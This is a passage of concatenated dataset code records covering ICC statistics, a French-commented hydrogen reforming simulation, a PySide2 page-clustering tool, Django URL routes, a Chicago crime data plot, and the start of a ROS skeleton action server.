compute_RMS(data)\n EMS = compute_EMS(data)\n\n n_subject = data.shape[0]\n ICC2 = (BMS-EMS)/(BMS+(RMS-EMS)/n_subject)\n return ICC2\n\n\ndef get_feature_2data(data1_path, data2_path):\n group1_data = pd.read_csv(data1_path)\n group2_data = pd.read_csv(data2_path)\n feature_list = group1_data.columns.values.tolist()[1:]\n ICC_dir = {}\n for feature in feature_list:\n rater1 = np.array(group1_data[feature])\n rater2 = np.array(group2_data[feature])\n\n feature_data = np.stack((rater1,rater2),axis=1)\n feature_ICC = compute_ICC2(feature_data)\n ICC_dir[feature] = feature_ICC\n return ICC_dir\n\n\ndef get_feature_3data(data1_path, data2_path, data3_path):\n group1_data = pd.read_csv(data1_path)\n group2_data = pd.read_csv(data2_path)\n group3_data = pd.read_csv(data3_path)\n feature_list = group1_data.columns.values.tolist()[1:]\n ICC_dir = {}\n for feature in feature_list:\n rater1 = np.array(group1_data[feature])\n rater2 = np.array(group2_data[feature])\n rater3 = np.array(group3_data[feature])\n\n feature_data = np.stack((rater1,rater2,rater3),axis=1)\n feature_ICC = compute_ICC2(feature_data)\n ICC_dir[feature] = feature_ICC\n return ICC_dir\n\n\ndef get_feature_4data(data1_path, data2_path, data3_path, data4_path):\n group1_data = pd.read_csv(data1_path)\n group2_data = pd.read_csv(data2_path)\n group3_data = pd.read_csv(data3_path)\n group4_data = pd.read_csv(data4_path)\n feature_list = group1_data.columns.values.tolist()[1:]\n ICC_dir = {}\n for feature in feature_list:\n rater1 = np.array(group1_data[feature])\n rater2 = np.array(group2_data[feature])\n rater3 = np.array(group3_data[feature])\n rater4 = np.array(group4_data[feature])\n print(rater1)\n print(rater2)\n print(rater3)\n print(rater4)\n\n feature_data = np.stack((rater1,rater2,rater3,rater4),axis=1)\n feature_ICC = compute_ICC2(feature_data)\n ICC_dir[feature] = feature_ICC\n return ICC_dir\n\n\ndef save_ICC_to_csv(ICC_dir, save_csv_path, name):\n data = pd.DataFrame(ICC_dir,index=[name])\n data_trans = pd.DataFrame(data.values.T, index=data.columns, columns=data.index)\n data_trans.to_csv(save_csv_path,columns=None)\n\n\ndef compute_all_ICC(ICC_path):\n group1_path = os.path.join(ICC_path,r'group1\\all_features.csv')\n group2_path = os.path.join(ICC_path,r'group2\\all_features.csv')\n group3_path = os.path.join(ICC_path,r'group3\\all_features.csv')\n save_csv_dir = ICC_path\n\n ICC_dir_12 = get_feature_2data(group1_path, group2_path)\n ICC_dir_13 = get_feature_2data(group1_path, group3_path)\n ICC_dir_23 = get_feature_2data(group2_path, group3_path)\n ICC_dir_123 = get_feature_3data(group1_path, group2_path, group3_path)\n\n save_ICC_to_csv(ICC_dir_12, os.path.join(save_csv_dir, 'ICC12.csv'), 'ICC12')\n save_ICC_to_csv(ICC_dir_13, os.path.join(save_csv_dir, 'ICC13.csv'), 'ICC13')\n save_ICC_to_csv(ICC_dir_23, os.path.join(save_csv_dir, 'ICC23.csv'), 'ICC23')\n save_ICC_to_csv(ICC_dir_123, os.path.join(save_csv_dir, 'ICC123.csv'), 'ICC123')\n\n\ndef compute_all_ICC_try():\n group1_path = r'D:\\PycharmProjects\\learning\\SHZL\\feature_data\\try\\ICC\\group1\\all_features.csv'\n group2_path = r'D:\\PycharmProjects\\learning\\SHZL\\feature_data\\try\\ICC\\group2\\all_features.csv'\n group3_path = r'D:\\PycharmProjects\\learning\\SHZL\\feature_data\\try\\ICC\\group3\\all_features.csv'\n group4_path = r'D:\\PycharmProjects\\learning\\SHZL\\feature_data\\try\\ICC\\group4\\all_features.csv'\n save_csv_dir = r'D:\\PycharmProjects\\learning\\SHZL\\feature_data\\try\\ICC'\n\n ICC_dir_1234 = get_feature_4data(group1_path, group2_path, group3_path, group4_path)\n\n save_ICC_to_csv(ICC_dir_1234, os.path.join(save_csv_dir, 'ICC1234.csv'), 'ICC1234')\n\n\n# print(compute_ICC2(data_try))\n\n# feature = 'non_contrast.nii_log-sigma-1-0-mm-3D_firstorder_10Percentile'\n\n# pick_group1_data(r'F:\\SHZL\\data\\2d\\all',r'F:\\SHZL\\data\\2d\\ICC_new\\group2', r'F:\\SHZL\\data\\2d\\ICC_new\\group1')\n\n\ncompute_all_ICC(r'D:\\PycharmProjects\\learning\\SHZL\\feature_data\\2d\\new_ICC')\n\n# compute_all_ICC_try()\n\n\n","sub_path":"process/compute_ICC.py","file_name":"compute_ICC.py","file_ext":"py","file_size_in_byte":5664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"586762260","text":"from array import array\n\nfrom numpy import *\nfrom scipy.optimize import fsolve\nfrom matplotlib import pyplot as plt\n\nP0 = 1 #bar\nMMCH4 = 16.04\nMMH20 = 18.02\nMMCO = 28.01\nMMCO2 = 44.01\nMMH2 = 2.02\nMMO2=32\nCpProcess=2900 #[/KgK]\nCpCombustion=2900 #[j+kgK]\n\n\n# Retourn le nbr de mole de chaque element en sortie du SMR\n#\n#Rapport molaire H2O/CH4 doit etre entre 1 et 4\n#\ndef SMR(ch4, h2O, P, T):\n T_SMR = T # 22 avec 800\n K_SMR = 10 ** (-11650 / T + 13.076)\n K_WGS = 10 ** (1910 / T - 1.764)\n\n def func(p):\n X1, X2 = p\n Y = 2 * X1 + ch4 + h2O\n SMR = (X1 - X2) * (3 * X1 + X2) ** 3 * (P / P0) ** 2 - K_SMR * (ch4 - X1) * (h2O - X1 - X2) * Y ** 2\n WGS = (3 * X1 + X2) * X2 - K_WGS * (X1 - X2) * (h2O - X1 - X2)\n return SMR, WGS\n\n sol = fsolve(func, (0.3, 0.6))\n X1 = sol[0] # 0.65\n X2 = sol[1] # 0.26\n #print(\"X1: \", X1, \"\\nX2: \", X2)\n #print(\"Erreur de l'ordre de :\", func(sol))\n\n nCH_4 = ch4 - X1;\n nH_2O = h2O - X1 - X2\n nCO = X1 - X2\n nCO_2 = X2\n nH_2 = 3 * X1 + X2\n\n return array([nCH_4, nH_2O, nCO, nCO_2, nH_2])\n\n# Retourn le nbr de mole de chaque element en sortie de l'ATR\n#\n# Rapport molaire H2O/CH4=1.15 et O2/CH4=0.6\n# ATTENTION On ajoute 2* 'O2' de mole dans le système\n#\ndef ATR(CH4, H2O, O2, P, T):\n K1 = 10 ** (-11650 / T + 13.076)\n K2 = 10 ** (1910 / T - 1.764)\n\n def func(p):\n X1, X2 = p\n\n y = CH4 + H2O + O2 - X1 - X2 - O2 / 2\n y = CH4 + H2O + O2 + 2 * X1 # achill\n EQ1 = (3 * X1 + X2) ** 3 * (P / P0) ** 2 * (X1 - X2) - K1 * y ** 2 * (H2O + O2 - X1 - X2) * (CH4 - X1 - 0.3)\n EQ2 = (3 * X1 + X2) * (O2 / 2 + X2) - K2 * (X1 - X2) * (H2O + O2 - X1 - X2)\n\n return EQ1, EQ2\n\n X1, X2 = fsolve(func, (0.6, -0.04))\n #print(\"X1:\", X1, \"\\nX2:\", X2) #solution est de 0.6517,-0.0719\n #print(\"L'erreur est de: \", func([X1, X2]))\n\n return array([CH4 - X1 - O2 / 2, H2O + O2 - X1 - X2, X1 - X2, O2 / 2 + X2, 3 * X1 + X2])\n\n\n# PLOT l'évolution du circuit\ndef plot(title, ch4, h20, evolutionA):\n four = evolutionA[0]\n wgs = evolutionA[1]\n condensation = evolutionA[2]\n absortion = evolutionA[3]\n\n def getPlotX(e, index):\n a = zeros(len(evolutionA))\n for i in range(0, len(evolutionA)):\n a[i] = evolutionA[i][index]\n return a\n\n # ********GRAPH MOLAIRE*******************\n plt.figure()\n plt.title(title)\n plt.xlabel(\"Etapes du processus (0,1,2,3,4,5)\")\n plt.ylabel(\"mole/s\")\n\n plt.plot(getPlotX(evolutionA, 0), label=\"CH4\")\n plt.plot(getPlotX(evolutionA, 1), label=\"H2O\")\n plt.plot(getPlotX(evolutionA, 2), label=\"CO\")\n plt.plot(getPlotX(evolutionA, 3), label=\"CO2\")\n plt.plot(getPlotX(evolutionA, 4), label=\"H2\")\n plt.legend()\n plt.show()\n\n # *********GRAPH MASSIQUE**************\n plt.figure()\n plt.title(title)\n plt.plot(getPlotX(evolutionA, 0) * MMCH4, label=\"CH4\")\n plt.plot(getPlotX(evolutionA, 1) * MMH20, label=\"H2O\")\n plt.plot(getPlotX(evolutionA, 2) * MMCO, label=\"CO\")\n plt.plot(getPlotX(evolutionA, 3) * MMCO2, label=\"CO2\")\n plt.plot(getPlotX(evolutionA, 4) * MMH2, label=\"H2\")\n plt.xlabel(\"Etapes du processus (0,1,2,3,4)\")\n plt.ylabel(\"g/s\")\n plt.legend()\n\n plt.show()\n\n\n# retour une matrice contenant ce qui reste à la sortie de chaque étape du circuit\ndef circuit(ch4, h2o, autotherme=False):\n evolution = zeros((5, 5)) #est la matrice qui va contenir les débits à chaque étapes\n masseActuelle=0\n masseProduite=0\n\n # ****************ETAT INITIAL************\n debut=array([ch4, h2o, 0, 0, 0])\n print(\"\\nAu début nous avons [CH_4,H_2O,CO,CO_2,H_2]: \",debut )\n masseActuelle=ch4*MMCH4+h2o*MMH20\n\n\n\n #\n # ***************FOUR/SMR************\n #\n vaporeformageSortie=zeros(5);\n if autotherme==False:\n vaporeformageSortie=SMR(ch4, h2o, 30, 1100)\n else:\n vaporeformageSortie=ATR(ch4, h2o, 0.6, 50, 1300)\n #Débit molaire\n print(\"A la sortie du four,nous avons [CH_4,H_2O,CO,CO_2,H_2]mole: \", vaporeformageSortie)\n #Energie\n #E=dH *dn_ch4+masse*cp*dT\n t_out_vapo=0;\n if autotherme==False:\n t_out_vapo = 1100\n masseActuelle=vaporeformageSortie[0]*MMCH4+vaporeformageSortie[1]*MMH20+vaporeformageSortie[2]*MMCO+vaporeformageSortie[3]*MMCO2+vaporeformageSortie[4]*MMH2\n energieVapo=224e3*abs(vaporeformageSortie[0]-debut[0])+CpProcess*masseActuelle*10**(-3)*(t_out_vapo-693)\n print(\" Energie du vapformage conventionnel est de : \",energieVapo,'[J]')\n\n else:\n masseActuelle=vaporeformageSortie[0]*MMCH4+vaporeformageSortie[1]*MMH20+vaporeformageSortie[2]*MMCO+vaporeformageSortie[3]*MMCO2+vaporeformageSortie[4]*MMH2+vaporeformageSortie[0]*MMCH4*3/2\n\n #\n # On ajoute 2* 'O2' dans le système comme matière.\n # CH4 + 2O2 => 2 H2O +CO2 est l'une des equations pour résoudre l'ATR\n #\n masseActuelle+=0.6*MMO2\n\n t_out_vapo = 1300\n energieVapo=-803e3*debut[0]+CpCombustion*masseActuelle*10**(-3)*(t_out_vapo-693)\n print(\" Energie du vapformage conventionnel est de : \", energieVapo, '[J]')\n print(\" Energie pour passer du vapoformage à l'oxydation est nulle\")\n\n\n #\n #*************OXYDATION*******\n #2CH_4 +O_2 => 4H_2+2CO\n #\n def oxydation(CH4,H20,CO,CO2,H2):\n return 0,H20,CO+CH4,CO2,H2+2*CH4\n #Débit molaire\n oxydationSortie=oxydation(vaporeformageSortie[0], vaporeformageSortie[1], vaporeformageSortie[2], vaporeformageSortie[3], vaporeformageSortie[4])\n print(\"A la sortie de l'oxydation, nous avons [CH_4,H_2O,CO,CO_2,H_2]mole: \",oxydationSortie)\n ajoutO2=copy(vaporeformageSortie[0]/2)\n #Energie\n\n #\n # On rajoute 02\n # 2 CH4+ O2 => 4H2 + 2CO\n #\n masseActuelle+=vaporeformageSortie[0]/2\n deltaH_oxydation_reference=247.34e3\n energieOxy=deltaH_oxydation_reference+CpProcess*masseActuelle*10**(-3)*(609.15-t_out_vapo) #609.15=336+273.15\n\n print(\" Engergie produite par l'oxydation partiel = \",energieOxy)\n print(\" Pour passé de l'oxydation partiel au watergazship nous avons une energie de :\",CpProcess*masseActuelle*10**(-3)*(570-609.15))\n\n\n #\n # ***************WATER GAZ SHIP****************\n # Retourn le nbr de mole de chaque element à la sortie du WaterGazSHip\n #\n #DEBIT MOLAIRE\n def WGS(CH4, H2O, CO, CO2, H2):\n if CO >= H2O:\n nCO = CO - H2O\n nH_2O = 0\n else:\n nH_2O = H2O - CO\n nCO = 0\n\n nCO_2 = min(CO, H2O)\n nH_2 = min(CO, H2O)\n\n return CH4, nH_2O, nCO, nCO_2 + CO2, nH_2 + H2 # ch4,H2O,nCO2,H2\n WGSSortie = array(WGS(oxydationSortie[0], oxydationSortie[1], oxydationSortie[2], oxydationSortie[3], oxydationSortie[4]))\n WGSSortie = array( WGS(vaporeformageSortie[0], vaporeformageSortie[1], vaporeformageSortie[2], vaporeformageSortie[3], vaporeformageSortie[4]))\n\n print(\"A la sortie de WGS,nous avons [CH_4,H_2O,CO,CO_2,H_2] mole: \", WGSSortie)\n #ENERGIE\n # E=dH *dn_ch4+masse*cp*dT\n #La masse est conservé masseActuelle=oxydationSortie[0]*MMCH4+oxydationSortie[1]*MMH20+oxydationSortie[2]*MMCO+oxydationSortie[3]*MMCO2+oxydationSortie[3]*MMH2+ajoutO2*MMO2\n energieWGS=-34e3*abs(oxydationSortie[2]-WGSSortie[2])+masseActuelle*10**(-3)*CpProcess*(480-570)\n print(\" Energie produite ds le WGS: \",energieWGS, \"[J]\")\n\n print(\" Energie pour passé du WGS à la condensation = \",CpProcess*masseActuelle*10**(-3)*(350-480))\n\n #\n # **************CONDENSATION DE L H2O**************\n #\n #Debit molaire\n condensationSortie = copy(WGSSortie)\n condensationSortie[1] = 0\n H2OCondense = abs(WGSSortie[1] - condensationSortie[1])\n print(\"A la sortie de la condensation,nous avons [CH_4,H_2O,CO,CO_2,H_2] mole: \", condensationSortie)\n print(\" \",H2OCondense, \" mole de H2O sont elever par condensation\")\n masseProduite += H2OCondense * MMH20;\n #Energie\n print(\" Energie de la condensation: \",2257e3*WGSSortie[1]) #dH_condensation\n #a la sortie de la condensation\n masseActuelle-=H2OCondense*MMH20\n\n #\n # ***************ABSORPTION DE CO2***********************\n #\n absorptionSortie = copy(condensationSortie)\n absorptionSortie[3] = 0\n CO2Absorbe = abs(condensationSortie[3] - absorptionSortie[3])\n print(\"A la sortie de la absorption,nous avons [CH_4,H_2O,CO,CO_2,H_2] mole: \", absorptionSortie)\n print(\" \", CO2Absorbe, \" mole de CO2 sont absorbées\")\n masseProduite += CO2Absorbe * MMCO2;\n print(\" Energie a l'absorption: \",0)\n masseActuelle-=CO2Absorbe*MMCO2\n\n return array([debut,vaporeformageSortie,oxydationSortie,WGSSortie,condensationSortie,absorptionSortie])\n\n#\n# 'h_2o' est le nombre de mole d'eau donne pour la production d'H2\n#\ndef electrolyse(h_2o,tention):\n valence=2\n F=96485.33 #C/mol\n courant=F*h_2o*valence\n\n #E[KWh]=tension[V] * courant[A] * temps[s] * 1h/3600s * 1e-3\n E=tention*courant*1/3600 #Energie en wh\n\n productionH2=h_2o/2\n return productionH2,E\n\n\n\ndef productionH2(butH2,nbrDeMoleAjoute,autotherme):\n ch4 = 0\n n=0\n out=0\n while(out \",out,\" mole de H2\")\n'''\n\n\nprint(circuit(1250000,2.5*1250000,False))\nprint(\"\\n**************SMR********************************************\")\nn_ch4 = 1\nn_h2o = 2.5\nevolution = circuit(n_ch4, n_h2o, False)\n#plot(\"Circuit avec un réformeur conventionnel\", n_ch4, n_h2o, evolution)\n\nprint(\"\\n\\n**************ATR*****************************************\")\nn_ch4 = 1\nn_h2o = 1.15\nevolution = circuit(n_ch4, n_h2o, True)\n#plot(\"Circuit avec un réformeur autotherme\", n_ch4, n_h2o, evolution)\n","sub_path":"20181209circuit .py","file_name":"20181209circuit .py","file_ext":"py","file_size_in_byte":10325,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"580579965","text":"#!/usr/bin/env python3\n\nimport sys\nimport click\nimport numpy as np\nimport json\nimport enum\nimport io\nimport zipfile\nimport sklearn.cluster\nimport sklearn.neighbors\nimport random\n\nfrom PySide2 import QtWidgets, QtGui, QtCore\nfrom pathlib import Path\nfrom functools import lru_cache\nfrom cached_property import cached_property\nfrom tqdm import tqdm\n\nfrom origami.batch.core.processor import Processor\nfrom origami.batch.core.io import Artifact, Stage, Input, Output\nfrom origami.batch.core.utils import Spinner\n\n\nclass Archive:\n\tdef __init__(self, path):\n\t\tself._vectors = []\n\t\tself._images = []\n\t\tself._path = path\n\n\t\tif not path.name.endswith(\".zip\"):\n\t\t\traise click.UsageError(\"path needs to be a zip file.\")\n\n\t\twith zipfile.ZipFile(path, \"r\") as zf:\n\t\t\tfor name in tqdm(zf.namelist(), \"loading\"):\n\t\t\t\ttry:\n\t\t\t\t\tif name.startswith(\"__MACOSX/\"):\n\t\t\t\t\t\tcontinue\n\t\t\t\t\tif not name.endswith(\".signature.json\"):\n\t\t\t\t\t\tcontinue\n\n\t\t\t\t\tdata = json.loads(zf.read(name).decode(\"utf8\"))\n\n\t\t\t\t\tdata = np.array(data[\"grid\"])\n\n\t\t\t\t\tself._vectors.append(data.flatten())\n\t\t\t\t\tself._images.append(name.rsplit(\".\", 2)[0])\n\t\t\t\texcept UnicodeDecodeError:\n\t\t\t\t\traise\n\n\t\tself._vectors = np.array(self._vectors)\n\t\tself._tree = sklearn.neighbors.BallTree(\n\t\t\tself._vectors, leaf_size=5, metric=\"l1\")\n\n\t\tdensity_k = 5\n\t\td, i = self._tree.query(\n\t\t\tself._vectors, k=density_k, return_distance=True)\n\t\tself._density = np.mean(d[:, 1:], axis=-1)\n\n\t\tself._zf = zipfile.ZipFile(path, \"r\")\n\n\tdef close(self):\n\t\tself._zf.close()\n\n\t@property\n\tdef path(self):\n\t\treturn self._path\n\n\t@property\n\tdef size(self):\n\t\treturn len(self._images)\n\n\t@cached_property\n\tdef aspect_ratio(self):\n\t\tr = []\n\t\tn = len(self._images)\n\t\tfor k in random.sample(range(n), min(n, 5)):\n\t\t\tpixmap = self.image(k)\n\t\t\tr.append(pixmap.width() / pixmap.height())\n\t\treturn np.median(r)\n\n\tdef image(self, index):\n\t\tname = self._images[index] + \".thumbnail.jpg\"\n\t\tim_bytes = self._zf.read(name)\n\t\tpixmap = QtGui.QPixmap()\n\t\tpixmap.loadFromData(im_bytes)\n\t\treturn pixmap\n\n\tdef name(self, index):\n\t\treturn self._images[index]\n\n\tdef sorted_by_density(self, indices):\n\t\tdensities = self._density[indices]\n\t\ts = np.argsort(densities)\n\t\treturn indices[s]\n\n\t@lru_cache(maxsize=2)\n\tdef cluster(self):\n\t\tprint(\"clustering... \", end=\"\", flush=True)\n\t\talgorithm = sklearn.cluster.AgglomerativeClustering(\n\t\t\tn_clusters=None, affinity=\"l1\", distance_threshold=25, linkage=\"single\")\n\t\twith Spinner():\n\t\t\tclustering = algorithm.fit(self._vectors)\n\t\tprint(\"\\bdone\", flush=True)\n\t\treturn clustering\n\n\tdef neighbor(self, anchor):\n\t\td, i = self._tree.query([self._vectors[anchor]], k=2, return_distance=True)\n\t\treturn d[0][-1], i[0][-1]\n\n\tdef neighborhood(self, anchor, distance):\n\t\treturn self._tree.query_radius([self._vectors[anchor]], r=distance)[0]\n\n\nclass TableModel(QtCore.QAbstractTableModel):\n\tCOLUMNS = 4\n\tTHUMBNAIL = 256\n\n\tdef __init__(self, archive, indices=None):\n\t\tsuper(TableModel, self).__init__()\n\n\t\tif indices is None:\n\t\t\tindices = np.arange(archive.size)\n\t\tindices = archive.sorted_by_density(indices)\n\n\t\tself._archive = archive\n\t\tself._indices = indices\n\n\t\tself._columns = TableModel.COLUMNS\n\t\tself._thumnail_size = TableModel.THUMBNAIL\n\n\tdef page_index(self, row, column):\n\t\tindex = row * self._columns + column\n\t\tif self._indices is not None:\n\t\t\treturn self._indices[index]\n\t\telse:\n\t\t\treturn index\n\n\tdef page_name(self, index0):\n\t\tindex = self._indices[index0]\n\t\treturn self._archive.name(index)\n\n\t@lru_cache(maxsize=64)\n\tdef page_image(self, index0):\n\t\tindex = self._indices[index0]\n\t\tpixmap = self._archive.image(index)\n\t\tpixmap = pixmap.scaled(QtCore.QSize(\n\t\t\tself._thumnail_size, self._thumnail_size),\n\t\t\tQtCore.Qt.KeepAspectRatio,\n\t\t\tQtCore.Qt.SmoothTransformation)\n\t\treturn pixmap\n\n\tdef data(self, index, role):\n\t\tif role == QtCore.Qt.ToolTipRole:\n\t\t\ti = index.row() * self._columns + index.column()\n\t\t\tif i < len(self._indices):\n\t\t\t\treturn self.page_name(i).split(\"/\", 1)[-1]\n\n\t\tif role == QtCore.Qt.DecorationRole:\n\t\t\ti = index.row() * self._columns + index.column()\n\t\t\tif i < len(self._indices):\n\t\t\t\treturn self.page_image(i)\n\n\tdef rowCount(self, index):\n\t\tn = len(self._indices)\n\t\tc = self._columns\n\t\trows = n // c\n\t\tif n % c > 0:\n\t\t\trows += 1\n\t\treturn rows\n\n\tdef columnCount(self, index):\n\t\treturn self._columns\n\n\nclass NeighborhoodWidget(QtWidgets.QWidget):\n\ton_exit = QtCore.Signal()\n\n\tdef __init__(self, archive, anchor, table, parent=None):\n\t\tsuper().__init__(parent)\n\n\t\tself._archive = archive\n\t\tself._anchor = anchor\n\t\tself._table = table\n\n\t\tself._next_d, _ = archive.neighbor(anchor)\n\n\t\tself.slider = QtWidgets.QSlider()\n\t\tself.slider.setOrientation(QtCore.Qt.Horizontal)\n\t\tself.slider.setTickPosition(QtWidgets.QSlider.TicksBelow)\n\t\tself.slider.setTickInterval(1)\n\t\tself.slider.setMinimum(0)\n\t\tself.slider.setMaximum(100)\n\t\tself.slider.setValue(10)\n\t\tself.slider.valueChanged.connect(self._distance_changed)\n\n\t\tself.label = QtWidgets.QLabel()\n\t\tself.label.setAlignment(QtCore.Qt.AlignRight | QtCore.Qt.AlignVCenter)\n\n\t\tself._back_button = QtWidgets.QPushButton(\"back\")\n\t\tself._back_button.clicked.connect(lambda: self.on_exit.emit())\n\n\t\tlayout = QtWidgets.QHBoxLayout()\n\t\tlayout.addWidget(self.slider)\n\t\tlayout.addWidget(self._back_button)\n\n\t\tlayout_v = QtWidgets.QVBoxLayout()\n\t\tlayout_v.addLayout(layout)\n\t\tlayout_v.addWidget(self.label)\n\n\t\tself.setLayout(layout_v)\n\n\t\tself._update_model()\n\n\tdef _update_model(self):\n\t\td = self.slider.value()\n\t\tnhood = self._archive.neighborhood(self._anchor, d)\n\t\tself.label.setText(\"d=%d, found %d items, d1=%d.\" % (\n\t\t\td, len(nhood), self._next_d))\n\t\tself._model = TableModel(\n\t\t\tself._archive,\n\t\t\tnhood)\n\t\tself._table.setModel(self._model)\n\n\tdef _distance_changed(self):\n\t\tself._update_model()\n\n\nclass Mode(enum.Enum):\n\tCLUSTER = 1\n\tNEIGHBORHOOD = 2\n\n\ndef cluster_name(i):\n\tif i < 26:\n\t\treturn chr(ord(\"A\") + i)\n\telse:\n\t\treturn cluster_name(i // 26) + cluster_name(i % 26)\n\n\nclass ClusterSelector(QtWidgets.QWidget):\n\tdef __init__(self, table, archive, clustering, parent=None):\n\t\tsuper().__init__(parent)\n\n\t\tself._table = table\n\t\tself._model = None\n\n\t\tself._archive = archive\n\t\tself._labels = clustering.labels_.copy()\n\n\t\tself._clusters = [None]\n\t\tself._combo = QtWidgets.QComboBox()\n\t\tself._combo.addItem(\"all: %d pages\" % len(self._labels))\n\n\t\tlabels, counts = np.unique(self._labels, return_counts=True)\n\t\tcluster_index = 0\n\t\tcluttered = 0\n\t\tfor label, count in zip(labels, counts):\n\t\t\tif count < 5 or label < 0:\n\t\t\t\tself._labels[self._labels == label] = -1\n\t\t\t\tcluttered += count\n\t\t\t\tcontinue\n\n\t\t\tself._clusters.append(label)\n\t\t\tself._combo.addItem(\n\t\t\t\t\"cluster %s: %d pages\" % (cluster_name(cluster_index), count))\n\t\t\tcluster_index += 1\n\n\t\tif cluttered > 0:\n\t\t\tself._clusters.append(-1)\n\t\t\tself._combo.addItem(\"clutter: %d pages\" % cluttered)\n\n\t\tself._combo.currentIndexChanged.connect(self.switch_to_cluster)\n\t\tself.update_table()\n\n\t\tlayout = QtWidgets.QVBoxLayout()\n\t\tlayout.addWidget(self._combo)\n\t\tself.setLayout(layout)\n\n\tdef update_table(self):\n\t\tself.switch_to_cluster(self._combo.currentIndex())\n\n\tdef switch_to_cluster(self, index):\n\t\tlabel = self._clusters[index]\n\n\t\tif label is None:\n\t\t\tself._model = TableModel(self._archive)\n\t\telse:\n\t\t\tindices = np.nonzero(self._labels == label)[0]\n\t\t\tself._model = TableModel(self._archive, indices)\n\n\t\tself._table.setModel(self._model)\n\n\nclass Form(QtWidgets.QDialog):\n\tdef __init__(self, archive, parent=None):\n\t\tsuper().__init__(parent)\n\t\tself._archive = archive\n\t\tself.setWindowTitle(archive.path.name)\n\n\t\tself.table = QtWidgets.QTableView()\n\t\tself.model = None\n\t\tself.table.doubleClicked.connect(self.switch_to_neighborhood_view)\n\t\tself._mode = Mode.CLUSTER\n\n\t\tclustering = self._archive.cluster()\n\t\tself._csel = ClusterSelector(self.table, self._archive, clustering)\n\n\t\tself.table.setSizePolicy(\n\t\t\tQtWidgets.QSizePolicy.Minimum,\n\t\t\tQtWidgets.QSizePolicy.Minimum)\n\n\t\tratio = self._archive.aspect_ratio\n\n\t\thorizontal_header = self.table.horizontalHeader()\n\t\thorizontal_header.setSectionResizeMode(QtWidgets.QHeaderView.Fixed)\n\t\thorizontal_header.setDefaultSectionSize(TableModel.THUMBNAIL * ratio)\n\t\thorizontal_header.hide()\n\n\t\tvertical_header = self.table.verticalHeader()\n\t\tvertical_header.setSectionResizeMode(QtWidgets.QHeaderView.Fixed)\n\t\tvertical_header.setDefaultSectionSize(TableModel.THUMBNAIL)\n\t\tvertical_header.hide()\n\n\t\tmin_width = TableModel.THUMBNAIL * ratio * TableModel.COLUMNS\n\t\tself.table.setMinimumSize(min(min_width, 1280), 600)\n\n\t\tlayout = QtWidgets.QVBoxLayout()\n\t\tlayout.addWidget(self._csel)\n\t\tlayout.addWidget(self.table)\n\n\t\tself.setLayout(layout)\n\t\tself.layout = layout\n\n\tdef switch_to_cluster_view(self):\n\t\tif self._mode == Mode.CLUSTER:\n\t\t\treturn\n\t\tself._mode = Mode.CLUSTER\n\n\t\titem = self.layout.takeAt(0)\n\t\titem.widget().deleteLater()\n\n\t\tself._csel.show()\n\n\t\tself.model = None\n\t\tself.table.doubleClicked.connect(self.switch_to_neighborhood_view)\n\t\tself._csel.update_table()\n\n\tdef switch_to_neighborhood_view(self, index):\n\t\tif self._mode == Mode.NEIGHBORHOOD:\n\t\t\treturn\n\t\tself._mode = Mode.NEIGHBORHOOD\n\n\t\tself.table.doubleClicked.disconnect()\n\t\tself._csel.hide()\n\n\t\trow = index.row()\n\t\tcolumn = index.column()\n\t\tanchor = self.table.model().page_index(row, column)\n\n\t\twidget = NeighborhoodWidget(\n\t\t\tself._archive, anchor, self.table)\n\t\tself.layout.insertWidget(0, widget)\n\n\t\twidget.on_exit.connect(self.switch_to_cluster_view)\n\n\n@click.command()\n@click.argument(\n\t'archive_path',\n\ttype=click.Path(exists=True),\n\trequired=True)\n@Processor.options\ndef app(archive_path, **kwargs):\n\t\"\"\" Cluster pages in given archive. \"\"\"\n\tapp = QtWidgets.QApplication(sys.argv)\n\n\tarchive = Archive(Path(archive_path))\n\n\ttry:\n\t\tform = Form(archive)\n\t\tform.show()\n\n\t\tret = app.exec_()\n\tfinally:\n\t\tarchive.close()\n\n\tsys.exit(ret)\n\n\nif __name__ == \"__main__\":\n\tapp()\n","sub_path":"origami/tool/cluster.py","file_name":"cluster.py","file_ext":"py","file_size_in_byte":9732,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"550104141","text":"from django.urls import path\nfrom .views import customer_list, customer_detail, customer_search\n\nurlpatterns = [\n path('', customer_list, name='custs'),\n path('/', customer_detail, name='cust'),\n path('/cases/page/files/page/', customer_detail, name='cust'),\n path('page//', customer_list, name='custs'),\n path('search//', customer_search),\n]\n","sub_path":"medius/customers/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"433663173","text":"__author__ = 'bohe'\n\nimport requests, json\nimport matplotlib.pylab as plt\nfrom datetime import datetime\n\n# the initial frame work is to ensure that data can be crawled from the website\n# using the provided API, in this case, in a JSON format.\nurl_link = 'http://plenar.io/v1/api/detail-aggregate/?dataset_name=crimes_2001_to_present&obs_date__ge=2001-01-01&iucr=0110&arrest=yes&agg=month'\nr = requests.get(url_link)\ndataJSON = r.json()\n\nmainKeys = dataJSON.keys()\nprint(mainKeys)\n\n\nobjData = dataJSON.get(\"objects\")\nprint(len(objData))\nprint(objData[1].keys())\n\ncount = []\ntimedate = []\n\n\nfor item in objData:\n count.append(item.get('count') )\n timeSplits = datetime.strptime( item.get('datetime'), '%Y-%m-%dT%H:%M:%S' )\n temp = timeSplits.year + timeSplits.month/13.0\n timedate.append(temp)\n\n# Create a figure of size 8x6 inches, 80 dots per inch\nplt.figure(figsize=(5, 3), dpi=80)\nplt.subplot(1, 1, 1)\nplt.scatter(timedate, count, color=\"blue\")\nplt.xlim(2000, 2015)\nplt.show()\n# savefig(\"exercice_2.png\", dpi=72)\n","sub_path":"ChicagoCrimeDate.py","file_name":"ChicagoCrimeDate.py","file_ext":"py","file_size_in_byte":1028,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"449255874","text":"#! /usr/bin/env python\n\nimport sys\nimport rospy\nimport actionlib\n\nfrom skeleton_publisher import SkeletonManager\nfrom skeleton_tracker.msg import skeletonAction, skeletonActionResult\n\n\nclass skeleton_server(object):\n def __init__(self):\n # Start server\n rospy.loginfo(\"Skeleton Publisher starting an action server\")\n\n self._as = actionlib.SimpleActionServer(\"skeleton_action\", skeletonAction, \\\n execute_cb=self.execute_cb, auto_start=False)\n self._as.start()\n\n def 